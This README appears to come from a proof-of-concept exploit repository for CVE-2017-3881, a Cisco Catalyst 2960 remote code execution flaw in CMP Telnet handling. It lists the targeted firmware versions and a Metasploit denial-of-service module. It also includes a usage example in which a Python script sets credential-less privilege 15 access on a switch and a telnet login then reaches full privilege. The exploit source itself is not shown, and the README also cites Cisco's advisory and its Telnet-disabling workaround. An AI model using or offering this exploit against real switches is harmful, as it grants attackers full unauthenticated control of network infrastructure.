# PoC-CVE-2017-3881
Cisco Catalyst Remote Code Execution PoC
This repository contains proof-of-concept code for exploiting the remote code execution vulnerability in the Cluster Management Protocol (CMP) Telnet handling of Cisco IOS, disclosed by Cisco Systems on March 17th, 2017 - <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>
Description
-------------
Exploit write-up: https://errorcybernews.com/2017/05/11/cisco-systems-merilis-update-switch/
RCE exploit code is available for the Cisco Catalyst 2960 switch model. The exploit is firmware dependent: it only works against the exact IOS image it was built for. Two firmware versions are supported:
- 12.2(55)SE1 C2960-LANBASEK9-M
- 12.2(55)SE11 C2960-LANBASEK9-M
Denial-of-service code is available as a Metasploit Ruby module. It should work against most of the switches listed in the Cisco advisory, but this has not been confirmed. Both the RCE exploit and the DoS module need the switch's Telnet service to be reachable; the workaround given in Cisco's advisory is to disable Telnet and use SSH instead.
Usage example
-------------
```
$ python c2960-lanbasek9-m-12.2.55.se11.py 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.
catalyst1#show priv
Current privilege level is 15
```
Thanks to the author
-------------
Artem Kondratenko https://twitter.com/artkond
Repository contents
-------------
```
.
├── [2.7K] c2960-lanbasek9-m-12.2.55.se11.py
├── [2.7K] c2960-lanbasek9-m-12.2.55.se1.py
├── [1.5K] CVE-2017-3881-metasploit-module.rb
└── [1.3K] README.md
0 directories, 4 files
```